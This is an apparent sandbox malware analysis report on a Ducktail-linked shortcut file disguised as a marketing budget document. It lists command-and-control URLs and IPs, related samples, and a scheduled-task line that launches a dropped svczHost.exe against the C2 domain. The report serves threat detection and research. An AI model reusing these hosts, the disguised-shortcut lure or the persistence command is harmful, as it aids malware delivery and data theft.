          https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46903b0dfb975b9987fd6729e67c891c4b329b887232148c7de62a277aa7bb9f7bb172d0ba0fe9be28b36313fd0fe9b172de332f05512cd1a8b06a678d6fb6ee2d640939cb40f267bbf685fe9daffed49f6false
          • Avira URL Cloud: safe
          		unknown
          http://23.88.71.29:8000/client/wsfalse
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118fe714ca0926b898b3d3eca0a81e1c210false
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33a1ad49ca3cce39415efa5e154367a48c9b2235950ff73e0aa6e501ee70b1a57fd20e0e662cce5de5e764c8ea69e8f5460905e960f2da5e2d0f365f522005f31ce54fbcd4e6cc47d74d60a5e59c2a76ecfalse
          • Avira URL Cloud: safe
          		unknown
          http://uyt1n8ded9fb380.com/api/checkfalse
          • Avira URL Cloud: safe
          		unknown
          https://uyt1n8ded9fb380.com/Dfalse
          • Avira URL Cloud: safe
          		unknown
          https://chrome.cloudflare-dns.com/dns-queryfalse
            		high
            https://uyt1n8ded9fb380.com/file2/df74c18f34c2e710d864267392a9e7dd536421db41569695baf1b4e12a83cfb137d5fed4fab389dc3fe1f9d14e2ea9b0b1c6f436ead6c833a67fc34705a34ce37f99ec390c3f84cff14e2301a6a62566a46ff50f8be9ce2a5ac5ee46c1890e16fc40853878a3246bd074c17326c34158false
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6ab22273c73b70a1db6a1d1a5a722db57826cdbaf9bb1da919ab6b53967c4bf044fb82b81afdbf15569d5eccde03bc8c4a7a71498eb1d6b80d2600766aa798119e9744ccb9a12497618e8c21987262036false
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/StaticFile/RdpService/32false
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://html4/loose.dtdpowershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024powershell.exe, 00000002.00000002.3055105541.0000023D2DDA1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.compowershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE55016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE56393000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118fe714ca0powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e9powershell.exe, 0000000A.00000002.3324253534.000001EE55053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE56393000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://uyt1n8ded9fb380.com/d751powershell.exe, 00000002.00000002.3055105541.0000023D2DD82000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlXzKpowershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://aka.ms/nativeaot-csvczHost.exe, myRdpService.exefalse
                		high
                https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33a1powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://uyt1n8ded9fb380.compowershell.exe, 0000000A.00000002.3324253534.000001EE56393000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://osoft.copowershell.exe, 00000002.00000002.3129564568.0000023D44720000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://.csspowershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211874eaf2d7powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/PesterXzKpowershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/dotnet/runtimepowershell.exe, 0000000A.00000002.3583871028.000001EE64D2F000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B2C1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000000.3297685999.00007FF78B2C1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EA248000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYpowershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidsvczHost.exe, svczHost.exe, 00000011.00000002.4147590392.00007FF78B14F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exefalse
                          		high
                          https://aka.ms/dotnet-warnings/powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3583871028.000001EE64D2F000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4147590392.00007FF78B14F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B2C1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000000.3297685999.00007FF78B2C1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EA248000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
                            		high
                            https://aka.ms/winsvr-2022-pshelpXzKpowershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE5588C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.micros=3powershell.exe, 0000000A.00000002.3746273742.000001EE6D1F9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aka.ms/nativeaot-compatibilitymyRdpService.exe, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3120002105.0000023D3C4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2974080588.0000022EF72B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF12754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3614783990.000001DF212D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.pngXzKpowershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://uyt1n8ded9fb380.com/file2/775e5047ced9e7adcec83e62ab773682b1856875a6cad7da93c53afaf38114a980powershell.exe, 00000002.00000002.3055105541.0000023D2DDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.micrpowershell.exe, 00000015.00000002.3695051605.000001DF296D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3055105541.0000023D2C431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE7241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE54C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4147590392.00007FF78B14F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF11261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3348440701.0000017A8F7E1000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                      		high
                                      http://.jpgpowershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46903b0dfb975b9987fd6729e67c891c4b329powershell.exe, 0000000A.00000002.3324253534.000001EE55053000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://uyt1n8ded9fb380.com/file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6abpowershell.exe, 0000000A.00000002.3324253534.000001EE54C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE54EBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://uyt1n8ded9fb380.com/file2/df74c18f34c2e710d864267392a9e7dd536421db41569695baf1b4e12a83cfb137powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3120002105.0000023D3C4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3120002105.0000023D3C633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2974080588.0000022EF72B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF12754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3614783990.000001DF212D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE5588C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3672185635.0000017AA7AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE55053000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://go.micropowershell.exe, 00000015.00000002.3350768794.000001DF11C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3348440701.0000017A90198000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3348440701.0000017A90486000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/MartinKuschnik/WmiLightsvczHost.exe, 00000011.00000002.4142460353.00000179EA248000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/nativeaot-compatibilityypowershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321183b73b823powershell.exe, 00000002.00000002.3055105541.0000023D2DDA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3055105541.0000023D2E74A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uyt1n8ded9fb380.com/filepowershell.exe, 00000002.00000002.3055105541.0000023D2DDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05depowershell.exe, 00000002.00000002.3055105541.0000023D2DD82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://.AppV.AppVCpowershell.exe, 00000006.00000002.2977462889.0000022EFF63A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://uyt1n8ded9fb380.com/file3/0e8334e27730f66442615276cd9b2fc8cf5e6a24376c7dc468f7998d07140480f5powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.micropowershell.exe, 00000019.00000002.3672185635.0000017AA7AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.microsofpowershell.exe, 00000006.00000002.2978314235.0000022EFF6BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://uyt1n8ded9fb380.com/StaticFile/RdpService/32hsvczHost.exe, 00000011.00000002.4141517755.00000179E98A7000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE55053000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/nativeaot-compatibilityYmyRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                          		high
                                                          https://uyt1n8ded9fb380.com/file2/93f36e811e874b78005b821ed94567028efd4af63744edf59ae10ea6014e493f11powershell.exe, 00000002.00000002.3055105541.0000023D2C81F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://aka.ms/GlobalizationInvariantModepowershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4147590392.00007FF78B14F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                            		high
                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.3055105541.0000023D2C431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE7241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE54C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF11261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3348440701.0000017A8F7E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://uyt1n8ded9fb380.com:443/xsvczHost.exe, 00000011.00000002.4141517755.00000179E98AC000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4141517755.00000179E98A7000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              172.67.137.62
                                                              		uyt1n8ded9fb380.comUnited States
                                                              		13335CLOUDFLARENETUStrue
                                                              23.41.168.139
                                                              		unknownUnited States
                                                              		6461ZAYO-6461USfalse
                                                              206.206.126.252
                                                              		unknownUnited States
                                                              		13332HYPEENT-SJUSfalse
                                                              172.64.41.3
                                                              		chrome.cloudflare-dns.comUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              23.88.71.29
                                                              		unknownUnited States
                                                              		18978ENZUINC-USfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1551869
                                                              Start date and time:2024-11-08 10:55:53 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 11m 8s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                              Run name:Suspected VM Detection
                                                              Number of analysed new started processes analysed:45
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk
                                                              Detection:MAL
                                                              Classification:mal100.troj.expl.evad.winLNK@77/118@2/5
                                                              EGA Information:
                                                              • Successful, ratio: 12.5%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .lnk

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): CompPkgSrv.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.51.56.185, 52.202.204.11, 54.227.187.23, 23.22.254.206, 52.5.13.197, 23.200.0.21, 23.200.0.33, 23.62.230.92, 23.62.230.70, 142.251.32.99, 142.250.80.99, 142.251.40.227
                                                              • Excluded domains from analysis (whitelisted): www.bing.com, e4578.dscg.akamaiedge.net, ssl-delivery.adobe.com.edgekey.net, acroipm2.adobe.com.edgesuite.net, a122.dscd.akamai.net, ctldl.windowsupdate.com, p13n.adobe.io, www.gstatic.com, geo2.adobe.com, nexusrules.officeapps.live.com, acroipm2.adobe.com
                                                              • Execution Graph export aborted for target myRdpService.exe, PID 7080 because there are no executed function
                                                              • Execution Graph export aborted for target powershell.exe, PID 5892 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 6868 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7632 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7944 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 8 because it is empty
                                                              • Execution Graph export aborted for target svczHost.exe, PID 5060 because there are no executed function
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              04:58:06API Interceptor26777x Sleep call for process: powershell.exe modified
                                                              10:58:55Task SchedulerRun new task: zServicecakoi10 path: C:\Windows\Temp\svczHost.exe s>cakoi10 uyt1n8ded9fb380.com

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              172.67.137.62gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              O5PR3i6ILA.lnkGet hashmaliciousUnknownBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              YShfqKxCAU.lnkGet hashmaliciousDucktailBrowse
                                                              • uyt1n8ded9fb380.com/api/check
                                                              23.41.168.139https://qrco.de/bfSzSwGet hashmaliciousUnknownBrowse
                                                                Experiencehub.com_Report_53158.pdfGet hashmaliciousUnknownBrowse
                                                                  S4dd5N5VuJ.lnkGet hashmaliciousUnknownBrowse
                                                                    [MALICIOUS]_Secured_Doc-[yBv-26104].pdfGet hashmaliciousUnknownBrowse
                                                                      2FA Updating-2226-YZW.pdfGet hashmaliciousUnknownBrowse
                                                                        Refrence-Order#63729.pdfGet hashmaliciousAzorultBrowse
                                                                          Sales_Contract_Main_417053608_09.2024.pdfGet hashmaliciousUnknownBrowse
                                                                            Sales_Contract_Main_417053608_09.2024.pdfGet hashmaliciousUnknownBrowse
                                                                              140AEcuVy7.lnkGet hashmaliciousLonePageBrowse
                                                                                XnQmVRj5g0.lnkGet hashmaliciousLonePageBrowse
                                                                                  206.206.126.252gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws
                                                                                  U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws
                                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws
                                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws
                                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws
                                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws
                                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws
                                                                                  Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws
                                                                                  Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws
                                                                                  K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 206.206.126.252:8008/client/ws

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  uyt1n8ded9fb380.comaQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 172.67.137.62
                                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                  • 104.21.86.219
                                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
